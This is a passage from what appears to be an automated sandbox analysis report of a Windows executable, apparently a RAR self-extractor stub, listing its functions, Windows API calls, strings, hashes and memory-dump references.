                                                                                                                        • Opcode ID: dcf336e90ea47113d0560a27f6e24149b70bed9768e8df7279eed69905526cab
                                                                                                                        • Instruction ID: e30eb3a7e4cc4edf71f3671420a99d30c975171d514b98399250d615cb3e1eef
                                                                                                                        • Opcode Fuzzy Hash: dcf336e90ea47113d0560a27f6e24149b70bed9768e8df7279eed69905526cab
                                                                                                                        • Instruction Fuzzy Hash: 9DF0D0714101129F96456F56FE028E63BE9F7A4714381251FF618B63B1CB324A4ADF81
                                                                                                                        Function 00EA146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA14C2
                                                                                                                          • Part of subcall function 00E9B146: GetVersionExW.KERNEL32(?), ref: 00E9B16B
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EA14E6
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA1500
                                                                                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00EA1513
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA1523
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA1533
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2092733347-0
                                                                                                                        • Opcode ID: a991a380152e02df94c211e29b114f655d3f108acc356218b320b3d5008d503e
                                                                                                                        • Instruction ID: 43acac138dd70f778fe31168ceb29e52771155c4c1abd44ac83520fddace3e0d
                                                                                                                        • Opcode Fuzzy Hash: a991a380152e02df94c211e29b114f655d3f108acc356218b320b3d5008d503e
                                                                                                                        • Instruction Fuzzy Hash: A231F779108345AFC700DFA9C88499BB7E8BF98754F049A2EF995D3210E730E509CBA6
                                                                                                                        Function 00EB2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00EB2AF1,00EB02FC,00EAFA34), ref: 00EB2B08
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EB2B16
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EB2B2F
                                                                                                                        • SetLastError.KERNEL32(00000000,00EB2AF1,00EB02FC,00EAFA34), ref: 00EB2B81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 9318e245031b7263e69c1683efb8fe7ddde7e135a87c57a89546627abda1dc6e
                                                                                                                        • Instruction ID: a8760b749a8abf8d0c34a0071b7cc687ad34f4d0ed9f7ea4092abdf96b85a592
                                                                                                                        • Opcode Fuzzy Hash: 9318e245031b7263e69c1683efb8fe7ddde7e135a87c57a89546627abda1dc6e
                                                                                                                        • Instruction Fuzzy Hash: 5001F7322083126EEA252BB67CCADE72B99EF01778760273FF220751F0EF125D069144
                                                                                                                        Function 00EB97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00ED1030,00EB4674,00ED1030,?,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EB97E9
                                                                                                                        • _free.LIBCMT ref: 00EB981C
                                                                                                                        • _free.LIBCMT ref: 00EB9844
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB9851
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB985D
                                                                                                                        • _abort.LIBCMT ref: 00EB9863
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3160817290-0
                                                                                                                        • Opcode ID: e5d5fb62e2401150dffbd4ecf057875279af2e58a45fab6c0331f4a5fde5f8b8
                                                                                                                        • Instruction ID: 09c80bcad633ed9dd7b14ab874d71214dd3946e45ebcbf6495c698c6700351bf
                                                                                                                        • Opcode Fuzzy Hash: e5d5fb62e2401150dffbd4ecf057875279af2e58a45fab6c0331f4a5fde5f8b8
                                                                                                                        • Instruction Fuzzy Hash: 31F0CD361446016AC61933357D46FDB2AAD8FD2775F252135F724B22A3EF21C8068555
                                                                                                                        Function 00EADC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00EADC47
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EADC61
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EADC72
                                                                                                                        • TranslateMessage.USER32(?), ref: 00EADC7C
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00EADC86
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00EADC91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2148572870-0
                                                                                                                        • Opcode ID: cda9eb179421c1b2b78510a02ac51860aaca14c3be3fdc138e728e31f1e248a8
                                                                                                                        • Instruction ID: 48472c930b8d15dceb5b9effd0fcddff06c14d615eb25b186054477b0112a842
                                                                                                                        • Opcode Fuzzy Hash: cda9eb179421c1b2b78510a02ac51860aaca14c3be3fdc138e728e31f1e248a8
                                                                                                                        • Instruction Fuzzy Hash: 1AF03172A01219BBCB206BA6DC4DDDFBF7DEF46761B004022B50AF5051DA75964AC7A0
                                                                                                                        Function 00EAA80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAA699: GetDC.USER32(00000000), ref: 00EAA69D
                                                                                                                          • Part of subcall function 00EAA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EAA6A8
                                                                                                                          • Part of subcall function 00EAA699: ReleaseDC.USER32(00000000,00000000), ref: 00EAA6B3
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00EAA83C
                                                                                                                          • Part of subcall function 00EAAAC9: GetDC.USER32(00000000), ref: 00EAAAD2
                                                                                                                          • Part of subcall function 00EAAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00EAAB01
                                                                                                                          • Part of subcall function 00EAAAC9: ReleaseDC.USER32(00000000,?), ref: 00EAAB99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                                                        • String ID: "$($A
                                                                                                                        • API String ID: 1061551593-2217482528
                                                                                                                        • Opcode ID: ec9338674942e15f952e37d758b9e6a83bce5d25b7bbb26092c21634ffa63089
                                                                                                                        • Instruction ID: 713dd000a8c48ad38d93b0b14cd383293ea39feb9ca72bd37f52555f333cd786
                                                                                                                        • Opcode Fuzzy Hash: ec9338674942e15f952e37d758b9e6a83bce5d25b7bbb26092c21634ffa63089
                                                                                                                        • Instruction Fuzzy Hash: 7091F171204341AFD614DF25C844E2BBBE8FFCA700F04592EF59AE7220DB31A946CB62
                                                                                                                        Function 00E9C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA05DA: _wcslen.LIBCMT ref: 00EA05E0
                                                                                                                          • Part of subcall function 00E9B92D: _wcsrchr.LIBVCRUNTIME ref: 00E9B944
                                                                                                                        • _wcslen.LIBCMT ref: 00E9C197
                                                                                                                        • _wcslen.LIBCMT ref: 00E9C1DF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$_wcsrchr
                                                                                                                        • String ID: .exe$.rar$.sfx
                                                                                                                        • API String ID: 3513545583-31770016
                                                                                                                        • Opcode ID: 167b9c0814038f069a85a2a499061c35ab14d895559cb36fc9a30e7e5b097814
                                                                                                                        • Instruction ID: 2d39ad064ce53387b7d5db88c075e1f611a6faf9e14c164f0d2f451b14533b79
                                                                                                                        • Opcode Fuzzy Hash: 167b9c0814038f069a85a2a499061c35ab14d895559cb36fc9a30e7e5b097814
                                                                                                                        • Instruction Fuzzy Hash: 4141042150175196DB32BF349902A7B73B8EF49748F30790EF9917B182EB615982C355
                                                                                                                        Function 00E9BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00E9A275,?,?,00000800,?,00E9A23A,?,00E9755C), ref: 00E9BBC5
                                                                                                                        • _wcslen.LIBCMT ref: 00E9BC3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CurrentDirectory
                                                                                                                        • String ID: UNC$\\?\
                                                                                                                        • API String ID: 3341907918-253988292
                                                                                                                        • Opcode ID: 6393ed2525bc00196beff56d84f025a12bd151fa3d58f08678731719626fbcc0
                                                                                                                        • Instruction ID: be52392ed320d4b8ae2db858d72d1a21fe224e77fdd78ea8d6100032250f350d
                                                                                                                        • Opcode Fuzzy Hash: 6393ed2525bc00196beff56d84f025a12bd151fa3d58f08678731719626fbcc0
                                                                                                                        • Instruction Fuzzy Hash: 8741D231400215B6CF21AF60EE02EEFB7A8AF45394F00A52AF814B7151EB70EE90CA60
                                                                                                                        Function 00EACD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00EACD84
                                                                                                                          • Part of subcall function 00EAAF98: _wcschr.LIBVCRUNTIME ref: 00EAB033
                                                                                                                          • Part of subcall function 00EA1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E9C116,00000000,.exe,?,?,00000800,?,?,?,00EA8E3C), ref: 00EA1FD1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$CompareString
                                                                                                                        • String ID: <$HIDE$MAX$MIN
                                                                                                                        • API String ID: 69343711-3358265660
                                                                                                                        • Opcode ID: 8cc2f4f96b17cf76ae09b1c4735701cb08daf802d602a8b96d8502b140bb287c
                                                                                                                        • Instruction ID: 2f0989dc98a3316893b77907bdf1e49d16921d9d39feae9a6ba4939bd07405a0
                                                                                                                        • Opcode Fuzzy Hash: 8cc2f4f96b17cf76ae09b1c4735701cb08daf802d602a8b96d8502b140bb287c
                                                                                                                        • Instruction Fuzzy Hash: C03162769002499EDF25CB54DC41FEE73F8AB1A354F109566E502FB180EBB0AA848FA1
                                                                                                                        Function 00E9B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00E9B9B8
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00E9B9D6
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00E9B9E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                        • String ID: %c:\
                                                                                                                        • API String ID: 525462905-3142399695
                                                                                                                        • Opcode ID: 1b9b2c585893409007c3d5d969275411fa4ad8ca7ac770d4efad275d21f97a8d
                                                                                                                        • Instruction ID: abf6d281dae5b26cb133b799d5a5633aa10a4a272523e64332f43a707df5a9dc
                                                                                                                        • Opcode Fuzzy Hash: 1b9b2c585893409007c3d5d969275411fa4ad8ca7ac770d4efad275d21f97a8d
                                                                                                                        • Instruction Fuzzy Hash: 3901F56350031169DE306B75AD46DABA7ECEE95770B40681EF544F6082EB60D84082B1
                                                                                                                        Function 00EAB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EAB2BE
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00EAB2D6
                                                                                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 00EAB304
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: GETPASSWORD1$xz
                                                                                                                        • API String ID: 445417207-3234807970
                                                                                                                        • Opcode ID: 7119e156a73413cf86e7324b50907f16807ed6702381a8320196c82e159a919c
                                                                                                                        • Instruction ID: 00ff905aeeefb276aab5cfd83f3eab403ba718fac9c6b60be8d39a93a6535923
                                                                                                                        • Opcode Fuzzy Hash: 7119e156a73413cf86e7324b50907f16807ed6702381a8320196c82e159a919c
                                                                                                                        • Instruction Fuzzy Hash: 8411E132900118BADF219A749C4AFFE37ACEB4F704F001022FA45FA091C7A1AA598771
                                                                                                                        Function 00EAB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadBitmapW.USER32(00000065), ref: 00EAB6ED
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00EAB712
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAB744
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAB767
                                                                                                                          • Part of subcall function 00EAA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00EAB73D,00000066), ref: 00EAA6D5
                                                                                                                          • Part of subcall function 00EAA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA6EC
                                                                                                                          • Part of subcall function 00EAA6C2: LoadResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA703
                                                                                                                          • Part of subcall function 00EAA6C2: LockResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA712
                                                                                                                          • Part of subcall function 00EAA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00EAB73D,00000066), ref: 00EAA72D
                                                                                                                          • Part of subcall function 00EAA6C2: GlobalLock.KERNEL32(00000000), ref: 00EAA73E
                                                                                                                          • Part of subcall function 00EAA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00EAA762
                                                                                                                          • Part of subcall function 00EAA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00EAA7A7
                                                                                                                          • Part of subcall function 00EAA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00EAA7C6
                                                                                                                          • Part of subcall function 00EAA6C2: GlobalFree.KERNEL32(00000000), ref: 00EAA7CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                        • String ID: ]
                                                                                                                        • API String ID: 1797374341-3352871620
                                                                                                                        • Opcode ID: e01ae843cff8c0daeff6b56da5c46f05c93eb1b458c28f70fafab5371ace50ac
                                                                                                                        • Instruction ID: 69f029391004be5676502a930d731a127307b44199d81715a6d976c6680f72ce
                                                                                                                        • Opcode Fuzzy Hash: e01ae843cff8c0daeff6b56da5c46f05c93eb1b458c28f70fafab5371ace50ac
                                                                                                                        • Instruction Fuzzy Hash: 4401F9369002016BC7127B749C09E7F7AB99FCA756F091126F900BF292DFB19D09C661
                                                                                                                        Function 00EAD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EAD64B
                                                                                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00EAD661
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00EAD675
                                                                                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 00EAD684
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: RENAMEDLG
                                                                                                                        • API String ID: 445417207-3299779563
                                                                                                                        • Opcode ID: 32818b12854ddd0b6cefff43494f78924c4ff36d0267d05517d1d358a1086215
                                                                                                                        • Instruction ID: 3cc4e5dc933e38ed7487563badf73c2fd89dff7c37c668dd9b6926691d74776e
